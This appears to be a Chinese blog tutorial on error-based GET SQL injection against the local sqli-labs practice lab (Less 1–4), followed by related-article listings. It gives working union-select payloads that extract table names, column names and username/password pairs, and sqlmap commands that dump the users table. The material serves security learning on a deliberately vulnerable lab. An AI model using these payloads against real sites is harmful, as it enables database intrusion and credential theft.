【安全】P 2-4 GET基于报错的SQL注入(sqli-lab靶场Less1~4)

最新推荐文章于 2022-10-27 01:36:56 发布
最新推荐文章于 2022-10-27 01:36:56 发布
阅读量242 收藏 2
点赞数 1
分类专栏: 安全大师 文章标签: 网络安全 信息安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Z_David_Z/article/details/113445516
版权

目录

0X01 SQL注入的分类

根据根据注入位置数据类型可将SQL注入分为两类:数字型和字符型注入位置数据类型可将SQL注入分为两类:数字型和字符型

例如:
数字型:select * from table where id = 用户输入id
例如:
字符型:select * from table where id = ‘用户输入id’

0X02 GET基于报错的SQL注入发现

通过在URL中修改对应的ID值,为正常数字、大数字、字符(单引号、双引号、双单引号、括号)、反斜杠 \来探测URL中是否存在注入点。

实验:Sqli-Lab Less1~4,GET基于报错的SQL注入。
Less1 get-error based-single quotes-string
GET报错基于单引号字符串
在这里插入图片描述

Please input the ID as parameter with numeric value
请输入ID值作为对应参数
用GET方法进行尝试
?id=1
在这里插入图片描述

SELECT * FROM users WHERE id='1' LIMIT 0,1

出现对应的内容
改变id的值,从1-14都会有对应的值,当id=15时,没有显示,那么id最大值为14
接下来判断是否存在注入点
id=1’
在这里插入图片描述

我们来分析报错内容

‘‘1’’ LIMIT 0,1’
最左边和最右边的单引号是用来闭合输出错误的字符串信息

‘1’’ LIMIT 0,1
这是错误的具体内容

sql语句为:

 SELECT * FROM users WHERE id='1'' LIMIT 0,1

我们输入 1‘ 就会报错

同样的我问看一下第二关
Less2 get-error based-intiger based
get基于整数的报错
在这里插入图片描述

我们使用刚才的方式进行测试
id=1
在这里插入图片描述

id=1‘
在这里插入图片描述

分析报错内容
‘’ LIMIT 0,1’
最左边和最右边的单引号是用来闭合输出错误的字符串信息

’ LIMIT 0,1
这是错误的具体内容

sql语句为:

SELECT * FROM users WHERE id=1' LIMIT 0,1

我们再来看一下第三关
Less3 get-error based-single quotes with twist-string
GET报错基于单引号和括号字符串
在这里插入图片描述

同样的方式再来进行测试
id=1
返回正常的信息
在这里插入图片描述

id=1’
在这里插入图片描述

分析报错内容
‘‘1’’) LIMIT 0,1’
最左边和最右边的单引号是用来闭合输出错误的字符串信息

‘1’’) LIMIT 0,1
这是错误的具体内容

sql语句为:

SELECT * FROM users WHERE id=('1'') LIMIT 0,1

这里我们使用注释看一下,我们对于闭合符的判断是否正确
在这里插入图片描述

显示正常内容

sql语句为:

SELECT * FROM users WHERE id=('1') -- ') LIMIT 0,1

我们再来看第四关
Less4 get-error based-double quotes-string
GET报错基于双引号字符串
在这里插入图片描述

进行测试
id=1
在这里插入图片描述

id=1‘
在这里插入图片描述

没有报错,我们想一下原因是什么
因为使用双引号闭合,我们输入的任何数据都会被当作字符串处理,不论我们输入多少单引号和括号都会显示正常
在这里插入图片描述

那么我们使用双引号进行错误分析
在这里插入图片描述

‘“1"”) LIMIT 0,1’
最左边和最右边的单引号是用来闭合输出错误的字符串信息

“1"”) LIMIT 0,1
这是错误的具体内容

sql语句为:

SELECT * FROM users WHERE id=("1"") LIMIT 0,1

我们使用注释进行验证
在这里插入图片描述

显示正常

以上介绍了如何用字符进行探测,接下来讲解如何利用漏洞

0X03 GET基于报错的SQL注入利用

1、利用order by 判断字段数。(建议采用二分法)

id=1order by 3 --+
id=1order by 4 --+

在这里插入图片描述
在这里插入图片描述

2、利用union select 联合查询,获取表名。

id=0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

在这里插入图片描述

3、利用union select 联合查询,获取字段名。

id=0' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+

在这里插入图片描述

4、利用union select 联合查询,获取字段值。

id=0' union select 1,group_concat(username,0x3a,password),3 from users--+

在这里插入图片描述

Less1-4同理自己尝试一下

0X04 利用Sqlmap测试

获取数据库名称

sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-1/?id=1" --dbs --batch

在这里插入图片描述

获取表名

sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-1/?id=1" -D security --tables --batch

在这里插入图片描述

获取字段名

sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-1/?id=1" -D security  -T users --columns --batch

在这里插入图片描述

获取内容

sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-1/?id=1" -D security -T users -C "username,password" --dump

在这里插入图片描述

【安全】P2-3 Sqli-Lab实验环境搭建

【渗透工具】sqlmap下载安装详细教程Windows/Linux(图文)

-----E-----N-----D-----
😄如有问题,请各位师傅斧正,你的支持是我最大的动力。

骆驼实验室
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQLi-Labs 基于报错SQL注入
shangMD01的博客
02-17 2486
实验环境 操作系统:Windows10 安装应用软件:Sqlmap、Burpsuite、FireFox浏览器插件Hackbar等 靶机:A-SQLi-Labs 安装的应用软件:Apache、MYSQL、PHP;DVWA、SQLi-Labs 实验步骤: 1.访问目标网站 在Windows10上打开火狐浏览器,并访问靶机上的SQLi-labs网站Less-1 http://靶机ip/sql/Less-1 登录后,先给一个GET参数: http://靶机ip/sql/Less-1/?i
初学SQLi-LABS过关分享Less-3
SenTouKiReI的博客
06-10 765
初学sql注入SQLi-LABS过关分享Less-3
sqli-labs-基于报错的注入
zlloveyouforever的博客
04-30 2789
这里使用sqli-labs第六关来学习报错注入,当然第五关也是可以使用的。会简单介绍updatexml(),extractvalue(),floor(),exp(),geometrycollection(),multipoint()六个函数的使用。
利用Sqlmap进行SQL注入攻击
m0_62689523的博客
08-14 1779
sqlmap简介 sqlmap是一款基于python编写的渗透测试工具,在sql检测和利用方面功能强大,支持多种数据库。 功能:sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞。.........
SQL注入(使用sqli-labs案例以及sqlmap自动化注入工具)
04-29 4898
SQL注入sqli-labs: 一个实验平台,里面有完整的SQL注入课程,需要phpstudy环境,因此先安装phpstudy环境 phpstudy: https://www.xp.cn/ 安装后发现数据库和我本机的数据库出现冲突了,只能使用 sc delete mysql 删掉我本机的mysql8服务,如果需要使用原来的mysql,管理员命令下输入 mysqld --install 删除之后成功启动 启动成功后,去下载sqli-labs: https://github.com/Audi-1/
PHP、Apache环境中部署sqli-labs(SQL注入靶场
01-08
PHP、Apache 环境中部署 sqli-labs(SQL 注入靶场) 知识点 1: sqli-labs 介绍 sqli-labs 是一款开源的练习 SQL 注入的靶场工具,用 PHP 代码编写而成。它需要 PHP 和 Apache 环境运行。sqli-labs 提供了一个实践 ...
sqlilabs,里边赠送包含了,sqlilabs过关手册-注入天书,联系sql注入的绝佳靶场
06-28
Sqli-labs安装需要安装以下环境 apache+mysql+php,Tomcat+mysql+java(部分关卡需要) Sqli-labs安装 将之前下载的源码解压到web目录下,linux的apache为 /var/www/html下,windows下的wamp解压在www目录下。 修改...
phpstudy+靶场sqli-labs-master下载
最新发布
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sql注入 自学笔记 报错注入 二阶注入 布尔时间盲注 基于sqli-labs
02-19
下面是基于SQLi-Labs的SQL注入基础知识点: 一、报错注入 报错注入是指攻击者通过构造特定的SQL语句,让攻击者想要查询的信息通过页面的错误提示回显出来。报错注入一般需要具备两个前提条件: 1. Web应用程序未...
SQL注入——基于报错的注入(1)
qq_52072846的博客
02-18 2719
实验目的 熟悉报错功能函数extractvalue的用法,掌握基于报错SQL注入基本流程 实验原理 (1)关于报错注入 基干报错的注入,是指通讨构造特定的SOI语句,让攻击者想要查询的信息(如 数据库名、版本号、用户名等)通过页面的错误提示回显出来。 报错注入一般需要具备两个前提条件:(1)Web应用程序未关闭数据库报错函 数,对于一些SQL语句的错误直接回显在页面上:(2)后台未对一些具有报错 功能的函数进行过滤。 常用的报错功能函数包括extractvalue()、updatexml(、fl
sqlmap 进行sql漏洞注入
a10703060237的博客
07-05 712
有一款工具叫sqlmap主要用于识别sql漏洞并注入,这里我就写一篇教程教大家如何使用。 因为sql注入是非法的,所以我就使用两台自己的虚拟机进行测试,请大家不要在别人的网站上搞破坏。(现在大部分网站已经没有sql漏洞了,修复方法也很简单) 一、什么是sql漏洞 要搞清楚sql漏...
基于GET报错sql注入,sqli-lab 1~4
weixin_45694388的博客
08-08 171
根据注入类型可将sql注入分为两类:数字型和字符型 例如: 数字型: sleect * from table where if =用户输入id 字符型:select * from table where id ='用户输入id' (有引号) 通过URL中修改对应的D值,为正常数字,大数字,字符(单引号,双引号,双单引号,括号),反斜杠\来探测URL中是否存在注入点。 另外-- (这里有一个空格,–空格)在SQL内表示注释,但在URL中,如果在最后加上-- ,浏览器在发送请求的时候会把URL末尾的空格
sqli-labs靶场实现(一)【GET基于报错SQL注入】(less-1~4、具体步骤+图文详解)
weixin_46709219的博客
12-12 712
一)GET基于报错SQL注入 1)SQL注入的分类 2)get基于报错SQL注入发现 3)get基于报错SQL注入利用 4)利用sqlmap测试 二) 三) —————————————————————————————————————————————————— 一)GET基于报错SQL注入 1)SQL注入的分类 2)get基于报错SQL注入发现 3)get基于报错SQL注入利用 4)利用sqlmap测试 ...
SQLi-LABS靶场 less-4教学
小明师傅博客
06-11 300
and 1=1 and 1=2 ?id=1’没反应 试一下双引号可以了,发现还有个括号 成功
sqli-labs学习笔记(一)安装环境与less1-4 普通注入
闵行小鱼塘
09-02 715
开始系统学习sql注入,就来搞sqli-labs这个靶场,本篇是试水less1-4
安全】P 6 文件上传漏洞(手工+工具)绕过合集
Z_David_Z的博客
02-27 2737
目录0X01 绕过JS验证JS验证代码分析Burpsuite剔除响应JS浏览器审计工具剔除JS上传Webshell,菜刀连接0X02 绕过MIME-Type验证MIME-Type介绍验证MIME-Type代码分析Burpsuite绕过MIME-Type验证菜刀连接 虚拟终端功能0X03 绕过黑名单验证基于文件后缀名验证介绍基于黑名单验证代码分析Burpsuite绕过黑名单验证上传webshell菜刀连接0X04 绕过黑名单验证(.htaccess).htaccess文件介绍配置文件http.conf审计黑名
安全】P 5-6 GET型CSRF漏洞利用方法
Z_David_Z的博客
02-23 1956
目录0X01 链接利用0X02 iframe利用0X03 img标签利用0X04 CSS-backgroud利用 0X01 链接利用 在html中,a标签代表链接,可以将当前的”焦点” 指引到其他位置。 移动的“焦点”需要发送对应的请求到链接指向的地址,然后返回响应。 <a href = “请求地址,会被http 请求到的位置,可以携带GET型参数”> 内容 </a> <a href = “http://127.0.0.1/csrf_test/get_csrf/new_user
计算机体系结构(简记)
Z_David_Z的博客
10-27 1622
复杂指令集(Complex Instruction Set Computer):每个指令做复杂动作,完成操作需要较少指令,庞大。各种编程语言开发的软件项目:Java、PHP、C、Python、Ruby、Go…客户端:迅雷、QQ、百度网盘、腾讯课堂、网易云音乐、游戏客户端、腾讯视频.…常见的手机处理器:高通骁龙系列、苹果A系列、海思、麒麟系列、联发科天玑系列。3.5寸机械盘、2.5寸机械盘、2.5寸SATA固态盘、M.2固态盘。输入设备:键盘、鼠标、麦克风、摄像头、扫描仪、数位板、游戏手柄等等;
SQL注入学习之路:sqli-labs靶场实战解析
"sqli-labs靶场练习笔记涵盖了从2关到24关的SQL注入学习内容,适合初学者参考,涉及单引号、双引号注入,布尔盲注,数据库名、表名、列名的探测,以及利用注入进行文件写入和信息获取等技能。" 在SQL注入的学习过程...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值